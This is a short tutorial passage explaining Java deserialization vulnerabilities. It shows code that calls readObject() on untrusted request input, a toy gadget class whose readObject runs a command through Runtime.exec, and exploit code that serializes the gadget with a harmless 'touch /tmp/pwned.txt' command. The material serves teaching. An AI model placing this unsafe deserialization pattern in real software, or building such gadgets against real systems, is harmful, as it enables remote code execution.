== The Simplest Exploit

=== Vulnerable code

The following is a well-known example for a Java Deserialization vulnerability.

[source,java]
----
InputStream is = request.getInputStream();
ObjectInputStream ois = new ObjectInputStream(is);
AcmeObject acme = (AcmeObject)ois.readObject();
----

It is expecting an `AcmeObject` object, but it will execute `readObject()` before the casting ocurs.
If an attacker finds the proper class implementing dangerous operations in `readObject()`, he could serialize that object and force the vulnerable application to performe those actions.

=== Class included in ClassPath

Attackers need to find a class in the classpath that supports serialization and with dangerous implementations on `readObject()`.

[source,java]
----
public class GadgetObject implements Serializable {
    String cmd;

    private void readObject( ObjectInputStream stream ) throws Exception {
        Runtime.getRuntime().exec(cmd);
    }
}
----

=== Exploit

If the java class shown above exists, attackers can serialize that object and obtain Remote Code Execution.

[source,java]
----
GadgetObject go = new GadgetObject();
go.cmd = "touch /tmp/pwned.txt";

ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bos);
oos.writeObject(go);
oos.flush();
byte[] exploit = bos.toByteArray();
----